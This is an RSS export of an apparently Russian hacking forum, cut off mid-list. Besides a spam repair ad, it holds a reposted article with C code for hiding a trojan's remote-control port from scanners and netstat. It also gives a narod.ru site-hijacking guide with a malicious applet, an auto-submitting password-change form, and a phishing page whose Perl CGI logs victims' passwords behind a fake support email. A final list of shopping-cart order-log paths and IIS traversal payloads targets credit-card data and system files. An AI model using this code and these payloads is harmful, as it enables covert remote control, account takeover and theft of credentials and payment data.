<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://kasper.7li.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Kasper Xxxxxxxxx</title>
		<link>https://kasper.7li.ru/</link>
		<description>Kasper Xxxxxxxxx</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 17 Mar 2023 14:30:39 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Ремонт компьютеров,ноутбуков по России</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=30#p30</link>
			<description>&lt;p&gt;Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&amp;#160; &lt;a href=&quot;https://rempc-v-mo.ru/?t=33705&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://rempc-v-mo.ru/?t=33705&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (zqrlnbkvoa)</author>
			<pubDate>Fri, 17 Mar 2023 14:30:39 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=30#p30</guid>
		</item>
		<item>
			<title>Шапка-невидимка для трояна</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=29#p29</link>
			<description>&lt;p&gt;Что главное для троянов и прочих программ &amp;quot;удаленного управления&amp;quot; компом? Конечно незаметность! И даже если получиться сокрыть саму программу, в частности дав ей &amp;quot;невидимость&amp;quot; в диспетчере задач, то это целиком не решит всей проблемы. Остается еще один способ обнаружения таких программ - через их функции работы с сетью. Иногда сканер выдает: &amp;quot;открыто: 12345 порт - удаленное администрирование или trojan&amp;quot;. Вот так и ловятся трояны &lt;/p&gt;
						&lt;p&gt;Поэтому я тебе поведаю о способах сокрытия сетевых соединений, в чисто ознакомительных целях, конечно&amp;#160; Для начала рассмотрим, как можно обнаружить присутствие твоей проги на чужом компе. Как ты знаешь, трояны состоят из серверной и клиентской частей, причем серверная находиться на чужом компе. Отсюда и открытый порт трояна, который и обнаруживается сканером портов. Конечно, в ТСP соединении без этого не обойтись, сервер всегда должен иметь открытый порт, коннектясь к которому, сканер определяет, открыт порт или нет. От этого конечно не избавиться, но риск обнаружения можно намного уменьшить, даже свести его почти к нулю &lt;/p&gt;
						&lt;p&gt;Как можно уменьшить вероятность обнаружения, в обычном случае почти стопроцентную? Элементарно - не держать порт все время открытым, а открывать его только на короткий период через определенный промежуток времени. Конечно, это потребует усложнения клиентской части, да и может добавить трудностей при работе с сервером, но всегда можно подобрать соотношение между паранойей обнаружения трояна и удобством работы с прогой.&lt;/p&gt;
						&lt;p&gt;Для начала инициализируем библиотеку для работы с сокетами:&lt;/p&gt;
						&lt;p&gt;WSADATA WsaData; &lt;br /&gt;int err = WSAStartup (0x0101, &amp;amp;WsaData);&lt;br /&gt;if (err == SOCKET_ERROR) {&lt;br /&gt;printf (&amp;quot;WSAStartup() failed: %ld\n&amp;quot;, GetLastError ());&lt;/p&gt;
						&lt;p&gt;return 1; &lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Затем создадим структура адреса для сокета:&lt;/p&gt;
						&lt;p&gt;SOCKADDR_IN tr1; &lt;br /&gt;tr1.sin_family = AF_INET; &lt;br /&gt;tr1.sin_port = htons(1234);//port&lt;br /&gt;tr1.sin_addr.S_un.S_addr = inet_addr(&amp;quot;127.0.0.1&amp;quot;);//IP&lt;/p&gt;
						&lt;p&gt;Затем создадим сокет и &amp;quot;привяжем&amp;quot; его к структуре:&lt;/p&gt;
						&lt;p&gt;s = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);&lt;/p&gt;
						&lt;p&gt;bind( s, (LPSOCKADDR)&amp;amp;sin1, sizeof(sin1));&lt;/p&gt;
						&lt;p&gt;Все эти операции более подробно рассматривались в других статьях (например &amp;quot;TCP Logger своими руками&amp;quot;), поэтому не буду заострять внимания на их подробном описании.&lt;/p&gt;
						&lt;p&gt;Далее начинается собственно основная часть программы:&lt;/p&gt;
						&lt;p&gt;int evn=1;&lt;br /&gt;//evn - условие выхода, прерывания основного цикла. &lt;br /&gt;while (evn&amp;gt;0) &lt;br /&gt;{&lt;/p&gt;
						&lt;p&gt;AfxBeginThread(*MyFunction1,NULL);&lt;br /&gt;Sleep(1000);&lt;br /&gt;//запускаем один поток. Ждем 1000 мсек.&lt;/p&gt;
						&lt;p&gt;AfxBeginThread(*MyFunction2,NULL);&lt;br /&gt;Sleep(5000);&lt;br /&gt;//Запускаем второй поток. ждем 5000 мсек.&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;Теперь опишем функции потоков и их переменные. Переменную сокета s нужно сделать глобальной, так же как и структура адресов:&lt;/p&gt;
						&lt;p&gt;SOCKADDR_IN tr1; &lt;br /&gt;SOCKADDR_IN tr2; &lt;/p&gt;
						&lt;p&gt;Эта функция как раз и выполняет функцию сервера - открывает порт и обрабатывает подключения.&lt;/p&gt;
						&lt;p&gt;UINT MyFunction1( LPVOID pParam )&lt;br /&gt;{ &lt;/p&gt;
						&lt;p&gt;int sz=sizeof(tr2);&lt;br /&gt;int os;&lt;br /&gt;os=listen(s,1);&lt;br /&gt;if (os!=-1)&lt;br /&gt;{&lt;br /&gt;s2=accept(s,(struct sockaddr*)&amp;amp;tr2,&amp;amp;sz);&lt;br /&gt;//////здесь могут быть дополнительные функции.&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;return 0;&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Вторая функция &amp;quot;вырубает&amp;quot; сокет, поэтому вызов listen выдает ошибку, и порт закрывается. &lt;/p&gt;
						&lt;p&gt;UINT MyFunction2( LPVOID pParam )&lt;br /&gt;{ &lt;br /&gt;shutdown(s,0);//вырубание сокета.&lt;br /&gt;return 0;&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Таким образом получаем работу проги по следующему алгоритму:&lt;/p&gt;
						&lt;p&gt;- Открываем порт.&lt;br /&gt;- Ждем 1000 миллисекунд//это время порт открыт&lt;br /&gt;- Закрываем порт.&lt;br /&gt;- Ждем 5000 миллисекунд//это время - закрыт.&lt;/p&gt;
						&lt;p&gt;Так что порт будет открыт и может быть засечен сканером только 1/6 всего времени работы проги, т.е. вероятность обнаружения чуть более 16%. Параметры в 1 и 5 секунд можно изменять в широких пределах, только нужно не забывать о скорости передачи данных в сети. Где-нибудь в локалке и 100 миллисекунд более чем достаточно, а на тормозном dial-up&#039;e и секунды мало будет. Теперь нам нужно определиться, что нам нужно от трояна. Если он нужен только для передачи команд на чужой комп, то их вполне возможно передать в тот промежуток времени, когда порт открыт.&amp;#160; Для этого в месте дальнейшего кода пишем:&lt;/p&gt;
						&lt;p&gt;recv(s2,buf,sizeof(buf),0);&lt;br /&gt;if (buf==&amp;quot;Noconnect\0&amp;quot;) //Noconnect - ключевое слово&lt;br /&gt;//указывает, что коннект через 1000 мсек будет прерван&lt;br /&gt;{&lt;br /&gt;brk=1;&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Теперь все оставшееся время принимаем пакеты:&lt;/p&gt;
						&lt;p&gt;int stopp=1;&lt;br /&gt;//stopp - переменная, указывающая, что передача пакетов прекращена&lt;br /&gt;while (stopp&amp;gt;0)&lt;br /&gt;{&lt;br /&gt;recv(s2,buf,sizeof(buf),0);&lt;br /&gt;if (buf==&amp;quot;Endpackets\0&amp;quot;)&lt;br /&gt;//указывает, что передача пакетов окончена.&lt;br /&gt;{&lt;br /&gt;stopp=0;&lt;br /&gt;}&lt;br /&gt;//далее может быть интерпретатор команд, который выполняет переданные по сети //команды&lt;br /&gt;//наиболее простой путь - воспользоваться командой WinExec&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;Также следует отметить, что вместо команды &amp;quot;Endpackets&amp;quot; можно передать команду &amp;quot;Noconnect&amp;quot;, да и вообще без команды Endpackets можно обойтись, потому как связь оборвется через определенное время, но лучше все делать культурно&amp;#160; Только одно &amp;quot;но&amp;quot; - если команда &amp;quot;Noconnect&amp;quot; опоздает и придет после секундного интервала открытия порта, то он будет открыт весь цикл ожидания. Так что выбирай, что тебе нужнее - либо стопроцентно передать команды даже на плохой связи, либо незаметность функционирования проги. &lt;/p&gt;
						&lt;p&gt;Можно добавить еще одну полезную функцию - проверку скорости связи и установку периодов различного состояния порта. Время ты сам можешь подобрать в зависимости от состояния связи. Поэтому добавим следующие функции в &amp;quot;интерпретатор команд&amp;quot;:&lt;/p&gt;
						&lt;p&gt;if (buf==&amp;quot;Test\0&amp;quot;)&lt;br /&gt;//команда проверки связи&lt;br /&gt;{&lt;br /&gt;char buf1[7]=&amp;quot;TestOk\0&amp;quot;;&lt;br /&gt;send(s2,buf1,7,0);&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;Алгоритм - если получена команда &amp;quot;Тest&amp;quot; - тут же послать ответ. Клиентская часть будет подсчитает время между посылкой пакета с командой &amp;quot;Тest&amp;quot; и приемом пакета с командой &amp;quot;ТestOk&amp;quot;. В среднем время прохождения будет равно половине полученного значения. После этого можно думать о изменении периодов состояния портов&lt;/p&gt;
						&lt;p&gt;if (buf==&amp;quot;TimeWork\0&amp;quot;)&lt;br /&gt;//команда изменения длительности открытия порта&lt;br /&gt;{&lt;br /&gt;char buf1[10];&lt;br /&gt;recv(s2,buf1,10,0);&lt;br /&gt;//в этом пакете передается длительность периода открытия порта в миллисекундах&lt;br /&gt;//здесь должна быть функция перевода значения типа &amp;quot;массив char&amp;quot; в &amp;quot;integer&amp;quot;&lt;br /&gt;// а затем установка значения переменных длительности периодов.&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;if (buf==&amp;quot;TimeWait\0&amp;quot;)&lt;br /&gt;//команда изменения времени ожидания открытия порта&lt;br /&gt;{&lt;br /&gt;char buf1[10];&lt;br /&gt;recv(s2,buf1,10,0);&lt;br /&gt;//в этом пакете передается длительность периода ожидания в миллисекундах&lt;/p&gt;
						&lt;p&gt;}&lt;/p&gt;
						&lt;p&gt;Дело за малым - перевести полученные значения в тип integer и присвоить это значение нужной переменной.&amp;#160; &lt;/p&gt;
						&lt;p&gt;После этого серверную часть можно считать почти что супер-пупер-крутой&amp;#160; Осталось сделать такой же клиентскую часть&amp;#160; Алгоритм похож до безобразия, думаю, ты сам справишься с претворением его в код&amp;#160; Мы также коннектимся каждые N милисекунд, где N - время, которое порт открыт. По умолчанию - 1 секунда. Если подключение за это время не увенчалось успехом - значит порт сервера в этот момент времени закрыт, поэтому прерываем коннект и пытаеся подключиться еще раз. Так после нескольких неудачных попыток, повторенных в цикле, мы в конце концов подключимся к серверной части. &lt;/p&gt;
						&lt;p&gt;Этот способ, несмотря на очевидные плюсы, имеет и некоторые минусы. Например, юзер может посмотреть открытые порты на локальной машине с помощью проги netstat с ключом -an. Тогда прога выдаст что-то вроде:&lt;/p&gt;
						&lt;p&gt;TCP 0.0.0.0:500 0.0.0.0 LISTENING &lt;br /&gt;TCP 0.0.0.0:10000 0.0.0.0 LISTENING &lt;br /&gt;TCP x.x.x.x:12345 0.0.0.0 LISTENING&lt;/p&gt;
						&lt;p&gt;Так что все открытые порты видны как на ладони. Так что даже закрытый порт будет виден, но за одним исключением - если программа, которая открыла этот порт, будет завершена. Вот этим мы и воспользуемся. Правда, придется усложнить серверную часть трояна, сделав ее в виде 2 программ - вспомогательная будет периодически запускать основную, которая и будет выполнять все необходимые функции. &lt;/p&gt;
						&lt;p&gt;Алгоритм простой - первая прога в цикле запускает вторую, ждет M миллисекунд, опять запускает вторую и т.д. Вторая прога - в течении N миллисекунд выполняет нужные действия, завершается. Если троян должен работать непрерывно, можно сделать так, чтобы вторая прога не завершалась через N, а дабы не было N&#039;ого количества подключенных серваков, то проверяла бы вначале, есть ли соединение. И если есть, то завершала бы свою работу.&lt;/p&gt;
						&lt;p&gt;Для запуска второй проги можно воспользоваться функцией WinExec из библитеки Winbase.h Она позволяет запускать программы в различных режимах, в том числе и в фоновом. Этим мы и воспользуемся, запустив функцию с параметрами WinExec(&amp;quot;C:\...\tr.exe&amp;quot;,0); Первый параметр - путь к файлу. Правда, в таком случае прога будет видна в диспетчере задач (хотя это можно исправить, но данный вопрос выходит за рамки статьи), но вероятность ее обнаружения опять-таки будет мала, все зависит от соотношения длительности периодов ожидания/работы. В этот период троян можно засечь netstat&#039;ом, но опять-таки только во время работы проги, а не все время, как в первом случае.&lt;/p&gt;
						&lt;p&gt;Эти способы далеко не единственные, которыми можно решить эту интересную проблему, но другие я рассмотрю в следующей статье.&lt;/p&gt;
						&lt;p&gt; &lt;span style=&quot;color: red&quot;&gt;Взято с другого сайта!&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Thu, 07 Jan 2010 18:31:08 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=29#p29</guid>
		</item>
		<item>
			<title>ВЗЛОМ САЙТОВ,ВЗЛОМ САЙТА НА narod ru</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=28#p28</link>
			<description>&lt;p&gt;Как обычно берем наш любимый narod.ru , и ломаем его сайты. К примеру возьмем сайт wwwulashir.narod.ru&lt;br /&gt;и дефейсим его, как? да легко! Ты же знаешь что пасс на сайт , такой же как и к мылу. так вот пишим&lt;br /&gt;и вставляем его в письмо, (незабудь про соответствующий текст) и мыло лучше сделать support@narod.ru&lt;br /&gt;или administrator@narod.ru, ну короче ты понял! Вот те листинг его надо вставить в письмо.&lt;br /&gt;&amp;lt;applet code=readr.class name=readrie codebase=&amp;quot;_ПУТЬ_/&amp;quot; width=320 height=240 &amp;gt;&lt;br /&gt;SET Java On&lt;br /&gt;&amp;lt;/applet&amp;gt;&lt;br /&gt;import java.applet.*;&lt;br /&gt;import java.awt.*;&lt;br /&gt;mport java.net.*;&lt;br /&gt;public class readrie extends Applet&lt;br /&gt;{&lt;br /&gt;public void paint(Graphics g)&lt;br /&gt;{&lt;br /&gt;try&lt;br /&gt;{&lt;br /&gt;URL myURL=new URL(&amp;quot;_ПУТЬ_editprofil.html&amp;quot;);&lt;br /&gt;getAppletContext().showDocument(myURL,&amp;quot;_self&amp;quot;);&lt;br /&gt;}&lt;br /&gt;catch (Exception e)&lt;br /&gt;{&lt;br /&gt;g.drawString(&amp;quot;Error&amp;quot;, 10, 10);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;} &lt;/p&gt;
						&lt;p&gt;editprofil.html ( не забудьте отредактировать ИМЯ_ПОЛЬЗОВАТЕЛЯ и НОВЫЙ_ПАРОЛЬ)&lt;/p&gt;
						&lt;p&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;form method=post action=&amp;quot;http://koi.narod.ru/cgi-bin/modifyuser?modify&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;Username&amp;quot; value=&amp;quot;ИМЯ_ПОЛЬЗОВАТЕЛЯ &amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;text&amp;quot; name=&amp;quot;RealName&amp;quot; value=&amp;quot;A. V. Komlni&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;text&amp;quot; name=&amp;quot;Forward&amp;quot; value=&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;password&amp;quot; name=&amp;quot;Password&amp;quot; value=&amp;quot; НОВЫЙ_ПАРОЛЬ &amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;password&amp;quot; name=&amp;quot;Password_Verify&amp;quot; value=&amp;quot;НОВЫЙ_ПАРОЛЬ &amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=checkbox name=&amp;quot;Flags.DoNotKeepMail&amp;quot; &amp;gt; Не сохранять почту при пересылке&lt;/p&gt;
						&lt;p&gt;&amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Сохранить&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;input type=&amp;quot;reset&amp;quot; value=&amp;quot;Восстановить&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;&amp;lt;SCRIPT LANGUAGE=&amp;quot;JavaScript&amp;quot;&amp;gt;&lt;br /&gt;document.forms[0].submit();&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;/p&gt;
						&lt;p&gt;Все скрипт готов, кстати на народе поста глюканая, так что если файл будет вложением, то Messenger откр&lt;br /&gt;оет его автоматически. Еу а посли ты сам знаешь как попасть на сайт!!!&lt;br /&gt;Удачи те друг!!!&lt;/p&gt;
						&lt;p&gt;2&lt;/p&gt;
						&lt;p&gt;Вот сидел я и решил всё таки написать чё-нить&amp;#160; По большому настоянию Eraser. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать&amp;#160; Начнём для проведения нижеописанных действий вам понадобятся:&lt;br /&gt;1. Мозги&lt;br /&gt;2. Руки&lt;br /&gt;3. Хостинг с поддержкой CGI&lt;br /&gt;4. Небольшое знание HTML&lt;br /&gt;И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа&amp;#160; Подправляем его, как надо, вставляем туда форму:&lt;/p&gt;
						&lt;p&gt;Ещё надо написать write.cgi:&lt;br /&gt;&amp;amp;GetFormInput;&lt;/p&gt;
						&lt;p&gt;$name=$field{&#039;name&#039;};&lt;br /&gt;$pass=$field{&#039;pass&#039;};&lt;/p&gt;
						&lt;p&gt;sub GetFormInput {&lt;/p&gt;
						&lt;p&gt;(*fval) = @_ if @_ ;&lt;br /&gt;local ($buf);&lt;br /&gt;if ($ENV{&#039;REQUEST_METHOD&#039;} eq &#039;POST&#039;) {&lt;br /&gt;read(STDIN,$buf,$ENV{&#039;CONTENT_LENGTH&#039;});&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;$buf=$ENV{&#039;QUERY_STRING&#039;};&lt;br /&gt;}&lt;br /&gt;if ($buf eq &amp;quot;&amp;quot;) {&lt;br /&gt;return 0 ;&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;@fval=split(/&amp;amp;/,$buf);&lt;br /&gt;foreach $i (0 .. $#fval){&lt;br /&gt;($name,$val)=split (/=/,$fval[$i],2);&lt;br /&gt;$val=~tr/+/ /;&lt;br /&gt;$val=~ s/%(..)/pack(&amp;quot;c&amp;quot;,hex($1))/ge;&lt;br /&gt;$name=~tr/+/ /;&lt;br /&gt;$name=~ s/%(..)/pack(&amp;quot;c&amp;quot;,hex($1))/ge;&lt;/p&gt;
						&lt;p&gt;if (!defined($field{$name})) {&lt;br /&gt;$field{$name}=$val;&lt;br /&gt;}&lt;br /&gt;else {&lt;br /&gt;$field{$name} .= &amp;quot;,$val&amp;quot;;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;return 1;&lt;br /&gt;}&lt;br /&gt;open (OUTFILE, &amp;quot;&amp;gt;&amp;gt;pass.txt&amp;quot;);&lt;br /&gt;print OUTFILE &amp;quot;$name&amp;quot;;&lt;br /&gt;print OUTFILE &amp;quot;\n$pass&amp;quot;;&lt;br /&gt;print OUTFILE &amp;quot;\n=======END=======\n\n&amp;quot;;&lt;br /&gt;close (OUTFILE);&lt;br /&gt;print &amp;quot;Location: http://your_redirect_URL\n&amp;quot; ;&lt;/p&gt;
						&lt;p&gt;Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. &lt;br /&gt;Теперь пишем этому &amp;quot;карапузу&amp;quot; (прим. Eraser&#039;a : телепузу =)) письмо с анонимного мыла от support@narod.yandex.ru вида: &amp;quot;Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов&lt;br /&gt;надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот.&amp;#160; короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать .&lt;br /&gt;Дополнение:&lt;br /&gt;В доставание пароля вам поможет ваша фантазия при написание письма лопуху...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Thu, 07 Jan 2010 18:29:15 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=28#p28</guid>
		</item>
		<item>
			<title>Hacking Credit Card</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=27#p27</link>
			<description>&lt;p&gt;Hacking Credit Card&lt;br /&gt;trang n&amp;#224;y &amp;#273;&amp;#227; &amp;#273;&amp;#432;&amp;#7907;c &amp;#273;&amp;#7885;c l&amp;#7847;n &lt;/p&gt;
						&lt;p&gt;?search=action&amp;amp;keywords=%20&amp;amp;template=order.log&lt;br /&gt;&lt;a href=&quot;http://www.yahoo.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.yahoo.com/&lt;/a&gt;&lt;br /&gt;2. search for &amp;quot;/cgi/shopper.cgi?&amp;quot; or for more results try &amp;quot;/cgi-bin/shopper.cgi?&amp;quot; (&amp;quot;shopcart.cgi&amp;quot; can also be used)&lt;br /&gt;3. find a site (&amp;quot;your shopping cart&amp;quot; or &amp;quot;Subtotal $0.00&amp;quot;) and remove everything after shopper.cgi &lt;br /&gt;(the url should contain &lt;br /&gt;&amp;quot;/cgi/shopper.cgi?display=action&amp;quot; or &lt;br /&gt;&amp;quot;/cgi-bin/shopper.cgi?display=action&amp;quot; or &lt;br /&gt;possibly &amp;quot;checkout=action&amp;quot;)&lt;br /&gt;4. add &amp;quot;?search=action&amp;amp;keywords=%20&amp;amp;template=order.log&amp;quot; to the url and press enter&lt;/p&gt;
						&lt;p&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=apollos%2520&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=cgi_bin%20&amp;amp;template=order.log&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=cgi_bin%2520&amp;amp;template=shopper.conf&lt;br /&gt;/cgi-bin/shopper.cgi?search=action&amp;amp;keywords=powerd0wn%20&amp;amp;template=shopper.conf&lt;br /&gt;/cgi-bin/pdg_cart/shopper.conf &lt;br /&gt;/cgi-bin/products/loadpage.cgi?user_id=id&amp;amp;file=/orders.txt&lt;/p&gt;
						&lt;p&gt;-------------------IRCSHELL UNICODE FOR HACKING----------------&lt;/p&gt;
						&lt;p&gt;/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\&lt;br /&gt;/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;/test.php3&lt;br /&gt;/cgi-bin/test.php3&lt;br /&gt;/cgi-bin/cgiemail/uargg.txt&lt;br /&gt;/cgi-bin/web2mail.cgi&lt;br /&gt;/random_banner/index.cgi?image_list=alternative_image.list&amp;amp;html_file=../../../../../etc/hosts&lt;br /&gt;/random_banner/index.cgi?image_list=alternative_image.list&amp;amp;html_file=|ls%20-la|&lt;br /&gt;/example.jsp../&lt;br /&gt;/example%2ejsp&lt;br /&gt;/example.jsp..&lt;br /&gt;/index.jsp..&lt;br /&gt;/test.jsp..&lt;br /&gt;/example.jsp%81&lt;br /&gt;/index.JSP&lt;br /&gt;/index.jsp../&lt;br /&gt;/test.jsp../&lt;br /&gt;/index%2ejsp&lt;br /&gt;/test%2ejsp&lt;br /&gt;/index.JHTML&lt;br /&gt;/*.jhtml/&lt;br /&gt;/*.jsp/&lt;br /&gt;/ConsoleHelp/&lt;br /&gt;/*.shtml/&lt;br /&gt;/cgi-bin/mailview.cgi?cmd=view&amp;amp;fldrname=inbox&amp;amp;select=1&amp;amp;html=&lt;br /&gt;/cgi-bin/maillist.cgi?cmd=list&amp;amp;fldrname=inbox&amp;amp;fldnum=1&amp;amp;order=2&amp;amp;searchkey=&amp;amp;search_fldnum=0&amp;amp;page=99999&amp;amp;html=&lt;br /&gt;/cgi-bin/userreg.cgi?cmd=insert&amp;amp;lang=eng&amp;amp;tnum=3&amp;amp;fld1=test999%0als&lt;br /&gt;/..\..\..\winnt\repair\sam._&lt;br /&gt;:80/../../../autoexec.bat&lt;br /&gt;/......autoexec.bat&lt;br /&gt;/.html/............/autoexec.bat&lt;br /&gt;/../../../../../../../boot.ini&lt;br /&gt;/....../&lt;br /&gt;/..../&lt;br /&gt;/inc/&lt;br /&gt;/include/&lt;br /&gt;/iisadmpwd/&lt;br /&gt;/iissamples/&lt;br /&gt;/scripts/iisadmin/ism.dll%3fhttp/dir&lt;br /&gt;/iisadmin/ism.dll%3fhttp/dir&lt;br /&gt;/cgi-bin/htimage.exe&lt;br /&gt;/_vti_bin/fpcount.exe&lt;br /&gt;/global.asa&lt;br /&gt;/global.asa+.htr&lt;br /&gt;/global.asa\&lt;br /&gt;/default.asp+.htr&lt;br /&gt;/main.asp+.htr&lt;br /&gt;/_vti_bin/shtml.dll/tstt.htm&lt;br /&gt;/_vti_inf.html&lt;br /&gt;/_vti_log/author.log&lt;br /&gt;/_vti_pvt&lt;br /&gt;/_vti_bin/shtml.dll&lt;br /&gt;/_vti_bin/shtml.exe&lt;br /&gt;/_private/form_results.txt&lt;br 